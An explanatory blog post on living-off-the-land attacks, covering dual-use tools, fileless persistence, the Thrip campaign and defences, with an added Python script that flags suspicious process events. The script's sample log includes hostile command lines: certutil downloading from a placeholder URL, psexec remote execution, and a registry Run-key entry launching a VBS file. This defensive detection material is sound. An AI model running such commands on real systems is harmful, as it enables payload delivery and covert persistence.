Every company’s security provisions and network structures are multi-layered. A hacker gaining unauthorized access to one area of the network doesn’t necessarily mean they can steal data or affect operations in another.
However, in some situations an attacker is able to take the resources that they initially gain access to, primarily operating system features or network administrator tools, and use them to extend their infiltration. More and more, attackers are leveraging machine identities to hijack machine-to-machine connections and communications to move laterally through a network.
This is known as living off the land (LotL) and it is a growing problem for cybersecurity experts. In this post we explain how LotL attacks are carried out, how they can be identified and what you can do to mitigate the problem.
What are living off the land attacks?
Any intrusion that involves a malicious attacker deploying a network’s own tools against it to extend the attack has elements of a LotL approach.
Such attacks are sometimes described as fileless or zero-footprint attacks as they don't require the installation of malware from an external source. This makes them very difficult for antivirus tools to detect accurately as there are no indicators of outside connections, data exchange or interference.
LotL attacks can also be highly effective. The Ponemon Institute's State of Endpoint Security Risk Report found that fileless attacks are about ten times more likely to succeed than file-based attacks.
How LotL attacks take place
A living off the land attack usually follows three stages:
Gaining entry – while companies increasingly optimize security to guard against malware, less attention is sometimes paid to securing remote access systems. A company’s Virtual Private Network (VPN) or other remote access solution can be used by a wide range of internal and external stakeholders, including third-party contractors, and be a critical vulnerability when not properly secured.
Moving laterally – once inside a network an attacker living off the land will then use credentials, systems, and tools they have identified and accessed within it to move to other areas. This may be done by simply accessing new directories and data, or by setting up fake administrator accounts in order to change network settings.
Data theft and network damage – once they have access to the tools, permissions and directories they need, the attacker can then carry out their malicious purpose. This will often be some form of personal data theft or operational disruption.
The four main categories of attack
Symantec states that attackers who are living off the land will usually use one of four approaches:
Dual-use tools – This involves the commandeering of legitimate network and system management tools to navigate through networks, execute commands, exfiltrate data, and potentially download additional malicious software. Common tools exploited include FTP clients and system utilities like PsExec, a Microsoft Sysinternals tool designed for process execution on remote systems.
Fileless persistence – This attack type enables a malicious agent to persist on a system even after a reboot without having to write to the hard disk. This is often achieved by embedding malicious scripts in the Windows Registry, such as those involving Visual Basic Scripting (VBS).
Memory-only threats – These attacks execute the malicious payload directly within the system's memory, bypassing traditional disk-based storage. An example is the Code-Red worm of 2001, which exploited a vulnerability in Microsoft's IIS web server and spread widely without ever writing to the hard drive.
Non-Portable Executable (PE) file attacks – These attacks exploit scripts such as JavaScript or PowerShell, bypassing the need for binary executable (EXE) or dynamic-link library (DLL) files, to inflict harm.
Attacks may involve activities in one or more of these categories and there have been a number of combined threats identified over the years.
The Thrip attack
One of the major living off the land attacks occurred in January 2018. It was found that a large telecommunications operator in Southeast Asia had been infiltrated by attackers who were using internal tools and systems to avoid detection.
Once the system vulnerability and attackers’ behavior pattern had been noticed it was then identified at several other companies in the region, including businesses in the communication, defense and even satellite operations sectors.
The hackers, who became known as Thrip, were attempting to remotely install the malware Infostealer.Catchamas without tipping off system security personnel about their presence and activity.
Such behavior is another hallmark of an LotL attack. While moving and navigating within the network, using its own tools and functions, attackers will try to carry out “normal” activities in order to remain undetected for as long as possible. This can often mean that attacks aren’t spotted for weeks or even months.
How to protect against living off the land attacks
The initial strategy in defending against unauthorized access involves implementing robust security measures such as two-factor authentication and effective credential management across all VPNs and remote access systems.
Adopting a comprehensive approach to managing user and machine identities reduces the opportunities for malicious actors to penetrate and navigate through the network. Companies are especially vulnerable when keys and certificates are lost or compromised; such breaches provide attackers with the means to access secure, encrypted areas.
Attackers have manipulated system functionalities that handle certificate management. For example, CertUtil, a Windows utility for managing certificates, has been misused by attackers to download malicious payloads after tricking users into opening compromised files.
Enhancing the capacity to track and scrutinize identity creation and usage is important, as it increases the likelihood of detecting unusual activities typical of infiltrators early on—especially since those utilizing "living off the land" tactics often mimic legitimate behaviors to evade detection.
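The detection step above can be made concrete with a small triage script over process-creation events. This is an added example, not code from the original post or from any vendor: it applies three heuristics drawn from the behaviours described earlier (the certificate utility being pointed at a URL, the remote-execution tool being run by an account not expected to use it, and a script host being written into a Run key for fileless persistence). The log format, host names, accounts and the allow list are all constructed for the example.

```python
import re

# Constructed sample process-creation events (assumption: one event per line,
# " | " separated key=value fields; not the format of any particular product).
SAMPLE_LOG = """\
2018-01-15T09:12:03Z | host=ws-17 | user=CORP\\jsmith | parent=explorer.exe | image=outlook.exe | cmd=outlook.exe
2018-01-15T09:14:41Z | host=ws-17 | user=CORP\\jsmith | parent=winword.exe | image=certutil.exe | cmd=certutil.exe https://updates.example.invalid/u.txt
2018-01-15T09:15:10Z | host=ws-17 | user=CORP\\jsmith | parent=cmd.exe | image=psexec.exe | cmd=psexec.exe \\\\fs-02 ipconfig
2018-01-15T09:16:02Z | host=ws-17 | user=CORP\\jsmith | parent=cmd.exe | image=reg.exe | cmd=reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd /d "wscript.exe C:\\Users\\Public\\u.vbs"
2018-01-15T10:01:00Z | host=srv-01 | user=CORP\\svc_pki | parent=services.exe | image=certutil.exe | cmd=certutil.exe -verify C:\\certs\\backup.cer
"""

# Constructed allow list of accounts expected to run remote-execution tools.
ADMIN_ACCOUNTS = {"CORP\\itadmin"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)
SCRIPT_HOST_RE = re.compile(r"\b(wscript|cscript|mshta|powershell)\b|\.vbs\b", re.IGNORECASE)

def parse_event(line):
    """Split one log line into a dict; the timestamp is kept under 'ts'."""
    parts = [p.strip() for p in line.split(" | ")]
    event = {"ts": parts[0]}
    for field in parts[1:]:
        key, _, value = field.partition("=")
        event[key] = value
    return event

def check_event(event):
    """Return the names of the LotL heuristics the event matches."""
    image, cmd, user = event["image"].lower(), event["cmd"], event["user"]
    hits = []
    # Dual-use certificate utility given a URL instead of a local file.
    if image == "certutil.exe" and URL_RE.search(cmd):
        hits.append("certutil_with_url")
    # Remote process execution by an account not on the admin allow list.
    if image == "psexec.exe" and user not in ADMIN_ACCOUNTS:
        hits.append("psexec_unexpected_user")
    # Script host written to a Run key: registry-based fileless persistence.
    if image == "reg.exe" and RUN_KEY_RE.search(cmd) and SCRIPT_HOST_RE.search(cmd):
        hits.append("run_key_script_persistence")
    return hits

def scan_log(text):
    """Return (timestamp, host, user, [rules]) for every event that matched."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            ev = parse_event(line)
            hits = check_event(ev)
            if hits:
                findings.append((ev["ts"], ev["host"], ev["user"], hits))
    return findings

if __name__ == "__main__":
    for ts, host, user, rules in scan_log(SAMPLE_LOG):
        print(ts, host, user, ", ".join(rules))
```

Three of the five constructed events are flagged, all on the same workstation and user within a few minutes, which is the kind of clustering a reviewer would want surfaced; the legitimate certutil -verify run on the PKI server is not flagged.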
Ensuring that data transfers within the network between tools and system processes are securely encrypted will mitigate the extent of damage an attacker can inflict if they manage to breach the network undetected.
Ultimately, an attacker relying on "living off the land" methods is limited to the tools and systems accessible within the compromised network. By restricting access to potentially harmful features and controlling what can be done with them, it becomes more feasible to identify and halt a LotL attack swiftly.